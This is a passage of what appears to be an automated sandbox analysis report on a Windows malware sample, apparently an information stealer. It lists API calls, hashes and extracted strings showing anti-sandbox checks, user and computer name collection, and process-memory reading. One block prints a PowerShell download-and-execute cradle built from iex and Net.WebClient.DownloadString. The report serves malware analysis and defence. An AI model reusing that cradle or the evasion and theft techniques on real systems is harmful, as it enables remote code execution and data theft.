                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 2005412495-0
                                                  • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                  • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                  • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                  • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                  APIs
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B39B08
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B39B21
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B39B39
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B39B51
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B39B6A
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B39B82
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B39B9A
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B39BB3
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B39BCB
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B39BE3
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B39BFC
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B39C14
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B39C2C
                                                    • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B39C45
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B21437: ExitProcess.KERNEL32 ref: 00B21478
                                                    • Part of subcall function 00B213C7: GetSystemInfo.KERNEL32(?), ref: 00B213D1
                                                    • Part of subcall function 00B213C7: ExitProcess.KERNEL32 ref: 00B213E5
                                                    • Part of subcall function 00B21377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B21392
                                                    • Part of subcall function 00B21377: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B21399
                                                    • Part of subcall function 00B21377: ExitProcess.KERNEL32 ref: 00B213AA
                                                    • Part of subcall function 00B21487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B214A5
                                                    • Part of subcall function 00B21487: __aulldiv.LIBCMT ref: 00B214BF
                                                    • Part of subcall function 00B21487: __aulldiv.LIBCMT ref: 00B214CD
                                                    • Part of subcall function 00B21487: ExitProcess.KERNEL32 ref: 00B214FB
                                                    • Part of subcall function 00B369D7: GetUserDefaultLangID.KERNEL32 ref: 00B369DB
                                                    • Part of subcall function 00B213F7: ExitProcess.KERNEL32 ref: 00B2142D
                                                    • Part of subcall function 00B37AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B2141E), ref: 00B37AE7
                                                    • Part of subcall function 00B37AB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B37AEE
                                                    • Part of subcall function 00B37AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B37B06
                                                    • Part of subcall function 00B37B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B37B77
                                                    • Part of subcall function 00B37B47: RtlAllocateHeap.NTDLL(00000000), ref: 00B37B7E
                                                    • Part of subcall function 00B37B47: GetComputerNameA.KERNEL32(?,00000104), ref: 00B37B96
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D31
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B36D4F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B36D60
                                                  • Sleep.KERNEL32(00001770), ref: 00B36D6B
                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D81
                                                  • ExitProcess.KERNEL32 ref: 00B36D89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2525456742-0
                                                  • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                  • Instruction ID: a8840082b8f9cce6d0c045092c94c82c97dd461d0d86ab8a7ed03445c12dbcdb
                                                  • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                  • Instruction Fuzzy Hash: 41318875A40208BBCB04FBF0DC56FFD73B9AF16301F7055A8B152A2192EF745A04CA62
                                                  APIs
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                  • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                  • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                  • String ID:
                                                  • API String ID: 2311089104-0
                                                  • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                  • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                  • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                  • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                  APIs
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                  • ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                  • LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00B29D01
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                  • String ID:
                                                  • API String ID: 2311089104-0
                                                  • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                  • Instruction ID: c985539bf272c63394357cbc607befeca93d23dcca2da9524318bfc343af5bae
                                                  • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                  • Instruction Fuzzy Hash: C6312BB8A00209EFDB14CF94D885BEE77F5FF49700F108198E919A7290C774AA41CFA1
                                                  APIs
                                                  • __getptd.LIBCMT ref: 0041C9EA
                                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                  • __amsg_exit.LIBCMT ref: 0041CA0A
                                                  • __lock.LIBCMT ref: 0041CA1A
                                                  • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                  • free.MSVCRT ref: 0041CA4A
                                                  • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                  • String ID:
                                                  • API String ID: 634100517-0
                                                  • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                  • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                  • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                  • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                  APIs
                                                  • __getptd.LIBCMT ref: 00B3CC51
                                                    • Part of subcall function 00B3C206: __getptd_noexit.LIBCMT ref: 00B3C209
                                                    • Part of subcall function 00B3C206: __amsg_exit.LIBCMT ref: 00B3C216
                                                  • __amsg_exit.LIBCMT ref: 00B3CC71
                                                  • __lock.LIBCMT ref: 00B3CC81
                                                  • InterlockedDecrement.KERNEL32(?), ref: 00B3CC9E
                                                  • free.MSVCRT ref: 00B3CCB1
                                                  • InterlockedIncrement.KERNEL32(0042B980), ref: 00B3CCC9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                  • String ID:
                                                  • API String ID: 634100517-0
                                                  • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                  • Instruction ID: 5d30191e5092ebf8aa702b229a0226b6c8fcaa1f4fcb3398368a61b85f959d72
                                                  • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                  • Instruction Fuzzy Hash: 55010031A00A24AFC720ABA49845B5DBFE0FF00710FB04296EC1877290CB346881DBD9
                                                  APIs
                                                  • strlen.MSVCRT ref: 00416F1F
                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                    • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                  • String ID: @
                                                  • API String ID: 2950663791-2766056989
                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                  APIs
                                                  • strlen.MSVCRT ref: 00B37186
                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00B37401,00000000,00420BA8,00000000,00000000), ref: 00B371B4
                                                    • Part of subcall function 00B36E37: strlen.MSVCRT ref: 00B36E48
                                                    • Part of subcall function 00B36E37: strlen.MSVCRT ref: 00B36E6C
                                                  • VirtualQueryEx.KERNEL32(00B37574,00000000,?,0000001C), ref: 00B371F9
                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B37401), ref: 00B3731A
                                                    • Part of subcall function 00B37047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00B3705F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                  • String ID: @
                                                  • API String ID: 2950663791-2766056989
                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction ID: 0e496e9f388924f06824b9c343f7b0745de73f62dfaad9305ba0afabe6d2235f
                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction Fuzzy Hash: 6151F4B1A04109ABDB18CF98D981AEFB7F6FF88300F208559F915A7240D734AA11DBA5
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: *n@$*n@
                                                  • API String ID: 1029625771-193229609
                                                  • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                  • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                  • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                  • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                  APIs
                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 00B34A42
                                                    • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B34A68
                                                  • lstrcat.KERNEL32(?,?), ref: 00B34A87
                                                  • lstrcat.KERNEL32(?,?), ref: 00B34A9B
                                                  • lstrcat.KERNEL32(?,0064A284), ref: 00B34AAE
                                                  • lstrcat.KERNEL32(?,?), ref: 00B34AC2
                                                  • lstrcat.KERNEL32(?,0064A2C8), ref: 00B34AD6
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B38FF7: GetFileAttributesA.KERNEL32(00000000,?,00B21DBB,?,?,0042565C,?,?,00420E1F), ref: 00B39006
                                                    • Part of subcall function 00B347D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B347E7
                                                    • Part of subcall function 00B347D7: RtlAllocateHeap.NTDLL(00000000), ref: 00B347EE
                                                    • Part of subcall function 00B347D7: wsprintfA.USER32 ref: 00B3480D
                                                    • Part of subcall function 00B347D7: FindFirstFileA.KERNEL32(?,?), ref: 00B34824
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                  • String ID:
                                                  • API String ID: 2540262943-0
                                                  • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                  • Instruction ID: 0288467fb9b0023c4540ab8645a502d1f5e059ce3caf46df32290cb2a6cd1844
                                                  • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                  • Instruction Fuzzy Hash: 3C31A2F6940308ABCB10FBF0CC86EE973B8AB58700F4045C9B24592081EEB09789CF96
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                  Strings
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                  • ')", xrefs: 00412CB3
                                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                  • <, xrefs: 00412D39
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  • API String ID: 3031569214-898575020
                                                  • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                  • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                  • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                  • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B214A5
                                                  • __aulldiv.LIBCMT ref: 00B214BF
                                                  • __aulldiv.LIBCMT ref: 00B214CD
                                                  • ExitProcess.KERNEL32 ref: 00B214FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                  • String ID: @
                                                  • API String ID: 3404098578-2766056989
                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction ID: 40566be62d501f234bf72210eac55144bbcefc7ecd06d87ee6fe446329dcbee3
                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction Fuzzy Hash: EB016DB0940308BAEF10EBD4EC89B9DBBB8EB14705F208888F709772C0D7B49641CB55
                                                  APIs
                                                  • memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B30CC7: memset.MSVCRT ref: 00B30E83
                                                    • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00000000), ref: 00B30E9C
                                                    • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00420D7C), ref: 00B30EAE
                                                    • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00000000), ref: 00B30EC4
                                                    • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00420D80), ref: 00B30ED6
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  • memcmp.MSVCRT(?,00421114,00000003), ref: 00B2A116
                                                  • memset.MSVCRT ref: 00B2A14F
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B2A1A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                  • String ID: @
                                                  • API String ID: 1977917189-2766056989
                                                  • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                  • Instruction ID: 70cc57d805e77b624b8f0d3460353a01fee02c65de3672a35114cf7d5cc08481
                                                  • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                  • Instruction Fuzzy Hash: BE616971A00258EBCB18EFA4DD86FED77B1AF55300F608158F90AAB191DB746A05CB42
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00410DB8
                                                  • strtok_s.MSVCRT ref: 00410EFD
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00867190,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strtok_s$lstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 348468850-0
                                                  • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                  • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                  • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                  • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
